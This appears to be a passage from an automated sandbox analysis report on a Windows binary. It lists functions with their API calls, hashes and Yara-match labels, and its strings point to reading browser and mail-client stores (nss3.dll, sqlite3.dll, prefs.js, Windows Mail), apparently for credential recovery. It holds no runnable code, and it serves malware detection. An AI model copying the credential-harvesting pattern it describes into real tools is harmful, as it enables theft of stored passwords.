                                                                                                    • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                                    • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040246C, Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                      • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                                      • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                                      • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                                                                      • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                                                                    • LocalFree.KERNEL32(?), ref: 004025EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3503910906-0
                                                                                                    • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                                    • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                                                                    • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                                    • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B3C4, Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040B42E
                                                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040B472
                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040B52F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3798638045-0
                                                                                                    • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                                    • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                                                                    • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                                    • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A119, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                                                      • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                                                                    • strlen.MSVCRT ref: 0040A13F
                                                                                                    • atoi.MSVCRT ref: 0040A14D
                                                                                                    • _mbsicmp.MSVCRT ref: 0040A1A0
                                                                                                    • _mbsicmp.MSVCRT ref: 0040A1B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4107816708-0
                                                                                                    • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                                    • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                                                                    • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                                    • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410E8A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID: >$>$>
                                                                                                    • API String ID: 39653677-3911187716
                                                                                                    • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                                    • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                                                                    • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                                    • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040BC6D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                    • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                                    • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                                                                    • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                                    • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406F6F, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
                                                                                                    • Opcode ID: 824c31e82be034b4ae684e5ff0bfeccd484e942720956344e9c9b62c454f92e7
                                                                                                    • Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
                                                                                                    • Opcode Fuzzy Hash: 824c31e82be034b4ae684e5ff0bfeccd484e942720956344e9c9b62c454f92e7
                                                                                                    • Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040ED0B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                                    • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                                                                    • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                                    • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EFAE, Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SHGetMalloc.SHELL32(?), ref: 0040EFBE
                                                                                                    • SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
                                                                                                    • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
                                                                                                    • strcpy.MSVCRT(?,?), ref: 0040F017
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: BrowseFolderFromListMallocPathstrcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 409945605-0
                                                                                                    • Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                                    • Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
                                                                                                    • Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                                    • Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A437, Relevance: 6.0, APIs: 4, Instructions: 45stringwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004078FF: LoadStringA.USER32(00000000,0000000D,?,?), ref: 004079C8
                                                                                                      • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                    • sprintf.MSVCRT ref: 0040A45D
                                                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                                                                      • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,76020A60), ref: 0040797A
                                                                                                      • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                    • sprintf.MSVCRT ref: 0040A487
                                                                                                    • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 919693953-0
                                                                                                    • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                                    • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                                                                    • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                                    • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F3BA, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F3DC
                                                                                                    • strlen.MSVCRT ref: 0040F3E4
                                                                                                    • strlen.MSVCRT ref: 0040F3F1
                                                                                                      • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                      • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memsetstrcatstrcpy
                                                                                                    • String ID: sqlite3.dll
                                                                                                    • API String ID: 1581230619-1155512374
                                                                                                    • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                                    • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                                                                    • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                                    • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004098F4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00409917
                                                                                                    • memset.MSVCRT ref: 0040992D
                                                                                                      • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                      • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                                    • sprintf.MSVCRT ref: 00409957
                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,76020A60,00000000,?,?,004092ED,00000001,00412B1C,76020A60), ref: 00405F17
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                    • String ID: </%s>
                                                                                                    • API String ID: 3202206310-259020660
                                                                                                    • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                                    • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                                                                    • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                                    • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406734, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 00406736
                                                                                                    • strlen.MSVCRT ref: 00406741
                                                                                                    • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strlen$strcat
                                                                                                    • String ID: dA
                                                                                                    • API String ID: 2335785903-82490789
                                                                                                    • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                                    • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                                                                    • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                                    • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _ultoasprintf
                                                                                                    • String ID: %s %s %s
                                                                                                    • API String ID: 432394123-3850900253
                                                                                                    • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                                    • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                                                                    • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                                    • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D37A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strlen$FileFindFirst
                                                                                                    • String ID: *.*$prefs.js
                                                                                                    • API String ID: 2516927864-1592826420
                                                                                                    • Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                                    • Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
                                                                                                    • Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                                    • Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406680, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileNameSavestrcpy
                                                                                                    • String ID: L
                                                                                                    • API String ID: 1182090483-2909332022
                                                                                                    • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                                    • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                                                                    • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                                    • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040ADB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040ADD3
                                                                                                    • SetFocus.USER32(?,?), ref: 0040AE5B
                                                                                                      • Part of subcall function 0040AD9D: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040ADAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                    • String ID: l
                                                                                                    • API String ID: 3436799508-2517025534
                                                                                                    • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                                    • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                                                                    • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                                    • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408441, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040845A
                                                                                                    • SendMessageA.USER32(?,00001019,00000000,?), ref: 00408488
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendmemset
                                                                                                    • String ID: "
                                                                                                    • API String ID: 568519121-123907689
                                                                                                    • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                                    • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                                                                    • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                                    • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406618, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileNameOpenstrcpy
                                                                                                    • String ID: L
                                                                                                    • API String ID: 812585365-2909332022
                                                                                                    • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                                    • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                                                                    • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                                    • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407BB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000), ref: 00407BC1
                                                                                                    • sprintf.MSVCRT ref: 00407BE4
                                                                                                      • Part of subcall function 00407A64: GetMenuItemCount.USER32(?), ref: 00407A7A
                                                                                                      • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
                                                                                                      • Part of subcall function 00407A64: GetMenuItemInfoA.USER32(?), ref: 00407AD4
                                                                                                      • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
                                                                                                      • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
                                                                                                      • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
                                                                                                      • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                                                                    • String ID: menu_%d
                                                                                                    • API String ID: 3671758413-2417748251
                                                                                                    • Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                                    • Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
                                                                                                    • Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                                    • Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406325, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                                    • strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryWindowsstrcpy
                                                                                                    • String ID: PuA
                                                                                                    • API String ID: 531766897-3228437271
                                                                                                    • Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                                    • Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
                                                                                                    • Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                                    • Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408348, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
                                                                                                    • strrchr.MSVCRT ref: 00408351
                                                                                                    • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamestrcatstrrchr
                                                                                                    • String ID: _lng.ini
                                                                                                    • API String ID: 3097366151-1948609170
                                                                                                    • Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                                    • Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
                                                                                                    • Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                                    • Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403397, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString
                                                                                                    • String ID: (4@$Server Details
                                                                                                    • API String ID: 1096422788-3984282551
